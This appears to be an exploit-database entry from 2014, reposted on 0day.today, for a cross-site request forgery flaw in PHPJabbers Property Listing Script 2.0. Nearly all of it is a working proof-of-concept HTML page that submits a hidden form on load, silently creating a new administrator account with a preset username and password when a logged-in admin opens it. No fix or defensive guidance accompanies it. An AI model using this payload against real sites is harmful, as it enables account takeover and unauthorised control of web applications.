id: 21769
date: 01/15/2014
title: PHPJabbers Property Listing Script 2.0 - Add Admin CSRF Vulnerability
author: HackXBack
cves: 

Property Listing Script V2.0 - Add Admin CSRF Vulnerability
====================================================================
 
####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/property-listing-script/
####################################################################
 
===[ Exploit ]===
 
Cross Site Request Forgery
==========================
 
[Add Admin]
 
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminUsers&action=create"
enctype="multipart/form-data">
<input type="hidden" name="user_create" value="1" />
<input type="hidden" name="full_name" value="Iphobos" />
<input type="hidden" name="username" value="Admin" />
<input type="hidden" name="password" value="Password" />
<input type="hidden" name="status" value="T" />
<input type="hidden" name="role_id" value="1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
 
####################################################################

#  0day.today [2023-03-23]  #